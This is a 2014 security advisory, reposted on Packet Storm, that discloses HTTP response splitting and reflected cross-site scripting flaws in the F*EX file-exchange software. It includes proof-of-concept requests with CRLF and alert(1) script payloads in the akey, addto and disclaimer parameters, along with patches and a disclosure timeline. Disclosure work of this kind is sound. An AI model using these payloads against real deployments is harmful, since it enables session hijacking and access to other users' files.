what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

F*EX 20140313-1 HTTP Response Splitting / Cross Site Scripting

F*EX 20140313-1 HTTP Response Splitting / Cross Site Scripting
Posted Jun 3, 2014
Authored by Eric Sesterhenn | Site lsexperts.de

F*EX version 20140313-1 suffers from HTTP response splitting and cross site scripting vulnerabilities.

tags | exploit, web, vulnerability, xss
advisories | CVE-2014-3875, CVE-2014-3876, CVE-2014-3877
SHA-256 | 4dc3b01fde7c0d86d616433b95f0ae326f207faf8f3d2b9d094c09535ccd6b6e

F*EX 20140313-1 HTTP Response Splitting / Cross Site Scripting

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=== LSE Leading Security Experts GmbH - Security Advisory 2014-05-22 ===

F*EX (Frams' Fast File EXchange) - Multiple Issues
- - ---------------------------------------------------------------------

Affected Versions
=================
F*EX (Frams' Fast File EXchange) 20140313-1 as shipped with debian,
version fex-20140530 and later are not affected.

Issue Overview
==============
Technical Risk: medium
Likelihood of Exploitation: high
Vendor: Universität Stuttgart
Vendor URL: http://fex.rus.uni-stuttgart.de/
Credits: LSE Leading Security Experts GmbH employee Eric Sesterhenn
Advisory URL: https://www.lsexperts.de/advisories/lse-2014-05-22.txt
Advisory Status: Public
CVE-Number: CVE-2014-3875, CVE-2014-3876, CVE-2014-3877



Impact
======
It is possible to attack user sessions and to execute JavaScript in
another users browser. This might enable an attacker to gain access to files
which are intended for other users of the platform.



Issue Description
=================
While conducting an internal evaluation of the software, LSE Leading
Security Experts GmbH discovered multiple, remotely exploitable issues with
F*EX.

1) HTTP Response splitting in rup

CVE-Number: CVE-2014-3875

When inserting encoded newline characters into a request to rup, additional
HTTP headers can be injected into the reply, as well as new HTML code on the
top of the website.

- ----------------8<-------------
$ nc 127.0.0.1 8888
GET /rup?akey=test%0d%0a%0d%0aHELLO HTTP/1.0

HTTP/1.1 200 OK
X-Message: OK
Server: fexsrv
Expires: 0
Cache-Control: no-cache
X-Frame-Options: SAMEORIGIN
Set-Cookie: akey=test

HELLO; Max-Age=9999; Discard
Content-Type: text/html; charset=UTF-8

<html>
<head>
...
- ----------------8<-------------

The same attack is possible using a POST request.


2) Cross-Site-Scripting issue in rup

CVE-Number: CVE-2014-3876

The parameter akey is reflected unfiltered as part of the HTML page. Some
characters are forbidden in the GET parameter due to filtering of the
URL, but this can be circumvented by using a POST parameter.
Nevertheless, this issue is exploitable via the GET parameter alone,
with some user interaction.

Opening the following URL opens a popup window, when the cursor
moves over the back link on the bottom of the page:

http://127.0.0.1:8888/rup?akey=foo" onmouseover=alert(1) bar="

- ----------------8<-------------
<p>
<a href="/foc?akey=wow" onmouseover=alert(1) foo="">back to F*EX
operation control</a>
</body></html>
- ----------------8<-------------


3) Cross-Site-Scripting issue in fup

CVE-Number: CVE-2014-3877

The parameter addto is reflected only slightly filtered back to
the user as part of the HTML page. Some characters are forbidden in the GET
parameter due to filtering of the URL, but this can be circumvented by
using a POST parameter. Nevertheless, this issue is exploitable via the GET
parameter alone, with some user interaction.

Opening the following URL opens a popup window, when the cursor
moves over the recipient entry field:

http://127.0.0.1:8888/fup?addto=%22onmouseover=alert%281%29;bar=%22

- ----------------8<-------------
<tr title="e-mail address or alias"><td>recipient(s):
<td><input type="text" name="to" size="96"
value=""onmouseover=alert(1);bar=""><br>
</tr>
- ----------------8<-------------



4) Cross-Site-Scripting issue in fuc

CVE-Number: CVE-2014-3876

The POST parameter disclaimer is reflected back to the user as part of the
HTML page.

Setting the disclaimer POST parameter in the change disclaimer
operation (http://127.0.0.1:8888/fuc?
disclaimer=CHANGE&akey=2409d2a55e5acfa407929fb10cb8335f) to the
following value

- ----------------8<-------------
'"><script>alert(1)</script>
- ----------------8<-------------

will results in the following HTML code, which opens a popup window:

- ----------------8<-------------
<pre>
'"><script>alert(1)</script>
</pre>
<p>
- ----------------8<-------------

An additional attack is possible using the gm POST parameter, by setting
it to malicious HTML code and supplying a GET parameter group.

It looks like other values might be affected as well, since
only limited filtering is performed in the CGI parameter
evaluation.



Temporary Workaround and Fix
============================
LSE Leading Security Experts GmbH advises to deactivate F*EX until the
vendor
publishes a complete fix. LSE Leading Security Experts GmbH recommends to
implement proper filtering mechanisms for all parameters and the
implementation
of proper output encoding before reflecting values back to the user.

1) HTTP Response splitting in rup

- --- rup.orig 2014-05-23 08:50:01.558808000 +0200
+++ rup 2014-05-23 08:55:03.182808000 +0200
@@ -35,6 +35,7 @@ foreach my $v (param) {
$vv =~ s/[<>]//g;
if ($v =~ /^akey$/i) {
$vv =~ s:[/.]::g;
+ $vv =~ s/[\W]//g;
$akey = untaint($vv);
} elsif ($v =~ /^(from|user)$/i) {
$from = normalize_address($vv);


2) Cross-Site-Scripting issue in rup

The patch from 1) is sufficient to fix this issue as well.


3) Cross-Site-Scripting issue in fup

- --- fup.orig 2014-05-23 09:26:12.514808000 +0200
+++ fup 2014-05-23 09:26:53.794808000 +0200
@@ -2551,7 +2551,7 @@ sub setparam {
$replyto = untaint($replyto);
} elsif ($v eq 'ADDTO') {
$vv =~ s/\s.*//;
- - $vv =~ s/[<>]//g;
+ $vv =~ s/[<>"']//g;
$addto = untaint(lc($vv)); # if checkaddress($vv);
} elsif ($v eq 'SUBMIT') {
$submit = $vv;


4) Cross-Site-Scripting issue in fuc

No workaround from LSE. All parameters need to be filtered properly
and HTML encoded when reflected back to the user.



History
=======
2014-05-22 Issue discovered
2014-05-23 Issue reported
2014-05-23 Vendor reply
2014-05-26 Internal test version supplied by vendor
2014-05-26 Vendor releases a patch
2014-05-30 CVE-Numbers assigned
2014-06-03 Advisory released
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBAgAGBQJTjWHyAAoJEDgSCSGZ4yd8nVMP/2+ZuARnTXsDWbjgSebiU87z
X1kaTkmqqoXiTLSLshvh+aceRV8RDAf6tn+JIZtHAYK3R1wh3Nt6zLHPOL+Eykh4
Z4BnI0N0KgD1qgKvaGAZ0/v3XK/6PB1xPLlbo/bxmtyYkqY0bLsC81yRRLe1AQqZ
WiesJ6LS7Pf+YlVfARB0xUVRA+fWCYK5iriCDEnjqBZ5X2RXWCmnRsdF+g7Dpy41
vnG7XWqFbggMfV+fnWPT7wzMEBHUYavp24prRxSqJ3tEIrO11/SdbTyU2quxUIL/
SvGWUHKasRAOvHwIJFS/tCsUhIW+rTF7eUNCqyOoShN7c1Et1UZ0i4LXGqTZi2vI
logqi6ZUhWW2xfoW2FDUyXcEGUTbZOa58gYK4wwIg+n4ewzEZDhWX3Wul65wgmbs
72pReu9lCUIPzllvMCMU9DVNc/Jlz9mFiJoFrLBJAjJSymP4Aiva/4CBnzpmWcRo
Lt02zGYa0jMVgYKGiogw1nUTZPOxvieUQ+tzHhBGBYuwdHRuVLG6Tl9ju4P6GVWX
CUBtEmmqjPmBQS1CfSotkWhv7K5lCSVFuu8igEzMmk+dV/zahgM7EYf32BlbC634
lKImwv217DoNQj2fH8dMu2C6bGuQe0BLFDvFMV7UPNMzmngPQc50F95AHi0/adYY
waSLYfCklm+P2p9HP/E2
=TBQL
-----END PGP SIGNATURE-----
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close